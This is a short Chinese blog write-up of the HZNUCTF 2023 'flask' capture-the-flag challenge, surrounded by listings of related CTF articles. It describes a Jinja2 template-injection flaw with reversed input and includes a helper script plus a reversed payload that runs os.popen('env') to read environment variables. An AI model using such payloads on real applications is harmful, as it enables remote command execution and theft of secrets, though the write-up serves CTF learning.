每日练习-[HZNUCTF 2023 preliminary]flask

最新推荐文章于 2024-09-17 22:14:05 发布

He@11

最新推荐文章于 2024-09-17 22:14:05 发布

阅读量343

点赞数

文章标签： flask 数据库 python

本文链接：https://blog.csdn.net/m0_68113265/article/details/132396394

版权

文章讲述了如何在Flask应用程序中利用SSTI(Server-SideTemplateInjection)漏洞，通过倒序查找技术找到os子类的位置，并推测flag可能存在于环境变量中。作者给出了一个payload示例来进一步说明攻击过程。

摘要由CSDN通过智能技术生成

ssti-倒序

页面内容要求get一个name经过测试,只对语句进行倒序

倒序工具网站

# flask-SSTI之查询subclasses子类位置

with open('1.txt', 'r') as f:
    file = f.read().split(", ")

for i in range(0, len(file)):
    if file[i] == "<class 'os._wrap_close'>":
        print(i)
        break

查到os在132同时flag不在flag文件中

猜测flag在env中

payload:

}})(daer.)'vne'(]'nepop'[__slabolg__.__tini__.]231[)(__sessalcbus__.__esab__.__ssalc__.''{{

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

He@11

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

PLA5506-940-Product-Specification-Preliminary-Confidential.pdf

06-24

根据文档标题“PLA5506-940-Product-Specification-Preliminary-Confidential.pdf”以及描述“PLA5506-940-Product-Specification-Preliminary-Confidential”，该文档提供了一份关于型号为PLA5506-940的产品规格书...

Hydra3D-Datasheet-20200604-Preliminary.pdf

03-06

Hydra3D是一款基于飞行时间（ToF，Time-of-Flight）技术的CMOS传感器，由e2v公司出品。这款深度相机传感器旨在提供高精度、高分辨率的三维数据，适用于各种应用，包括机器人导航、增强现实、虚拟现实、工业自动化...

1 条评论您还未登录，请先登录后发表或查看评论

[HZNUCTF 2023 preliminary]flask

2301_80243833的博客

08-28

453

我们需要让用户输入一个字符串，对其进行反转操作，然后将反转后的字符串进行 Base64 编码，最后输出反转后的字符串。

HZNUCTF2023初赛

Emmaaaaa's blog

03-27

1684

cpdd：摩斯密码 classical：base + 凯撒 child_OTP：异或 child_quadratic_residue：直接开根法 child_proof_work：暴力破解uuid4{8位 - 4位 - 4位 - 12位} chile_steam：异或 child_RSA：基础RSA解密 RSA1：维纳攻击很简单的数学1：离散对数（discrete_log） child_gcd：费马小定理（a ** (p-1) = 1 mod p） RSA3：模运算法则，离散对数

NSSCTF-[HZNUCTF 2023 preliminary]-web

J1ng_Hong的博客

11-13

533

进题发现没有回显，我试着用dirsearch，发现找到的三个网页都是没有回显的。进题看到输入框，并且下面的提示看起来想sql注入，随便输了几次，发现只有数字1、2、3、4有回显，并且输入会逆向。它最后的回显肯定是在class B的__call 魔术方法里，所以我们需要让func和arg成为我们需要的变量。由于序列化中的b代表着Boolean，所以我试着把0改为1。然后我们就看到了回显，但是没找到flag。

HSCSEC CTF 2023 web-EZSYFLASK-wp

……

02-24

305

flask的PIN码攻击

[HZNUCTF 2023 preliminary] 2023杭师大校赛（初赛） web方向题解wp 全

Jay17的博客

08-16

1410

[HZNUCTF 2023 preliminary] 2023杭师大校赛（初赛） web方向题解wp 全

OV2718-rev-2A-Preliminary_200W_ov2718_CMOS_

09-29

在压缩包内的文件"OV2718-rev-2A-Preliminary-Specification-CSP5_Version-1-0_KingHorn.pdf"看来，这应是OV2718传感器的官方规格书，由KingHorn公司发布。这份PDF文档将详细列出OV2718的技术参数，包括但不限于： ...

Java-game-programming-preliminary.rar_java programming

09-23

现在流行的游戏似乎都是用C或C++来开发的。在java平台上几乎没有很大型及可玩的流行游戏。由于java是个新生语言，他的许多特性还有待大家的发掘,但是我们不能否认Java在游戏编程方面的强大性。本文将带领大家一步...

OV2718-rev-2A-Preliminary_200W_ov2718_CMOS_源码.zip

10-18

OV2718-rev-2A-Preliminary_200W_ov2718_CMOS_源码.zip这个压缩包文件包含了与OV2718 CMOS图像传感器相关的源代码，主要用于200万像素的应用场景。OV2718是一款由OmniVision Technologies公司设计的高性能、低功耗的...

HZNUCTF-ezflask

qq_44640313的博客

03-27

605

jinja2的注入

NSSCTF做题第9页（2）

wwwwyyyrre的博客

10-25

381

这道题主要有三个绕过点，第一个是__wakeup()函数，第二个是变量的MD5相等，但是两个变量不等那需要我们构造的两个类就是class lt和class fin构造的时候设置一个变量a，创建了一个类的对象lt然后把md5的条件满足一下，而这类的第一个变量$impo没有用到就可以利用它来指向下一个新创建的变量class fin，再利用fin里边的公共变量进行命令执行得到flagphpclass ltclass finpublic $a;

HZNUCTF2023 web

weixin_63231007的博客

05-07

1774

HZNUCTF校赛赛后复现

(反序列化)[HZNUCTF 2023 preliminary]ppppop

weixin_73668856的博客

12-08

521

简单的

CTF赛题分析之 Flask 目录穿越

程序员阿飘的博客

01-09

1203

最近身边有萌新想打ctf，我作为一个曾经接触过一点点ctf的业余菜鸡，就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新，所以很多地方可能都比较简单。如有错误之处，欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖：路由、调试和 Web 服务器网关接口（Web Server Gateway Interface，WSGI）子系统由 Werkzeug（werkzeug.pocoo.org/）提供；模板系统由Jinja2（jinja.pocoo.org/）提供。

[HZNUCTF 2023 preliminary]ppppop

qq_73767109的博客

06-10

481

这里在B类中调用system没有，直接触发__call方法并将system作为参数传入__call中造成执行系统命令来查看环境变量从而得到flag。得到源码后就是反序列化构造pop链了，不难看出是通过A类来触发B类中的__call从而实现任意命令执行。一片空白的原因可能就是布尔值为0，改成1再base64加密后替换原cookie发包。解码发现是序列化后的字符串而且有一个布尔类型的变量为0。打开一片空白,抓包发现base64加密后的cookie。

HZNUCTF2023部分wp-Reverse

m0_73393932的博客

04-04

824

逆向

Flask-Migrate的使用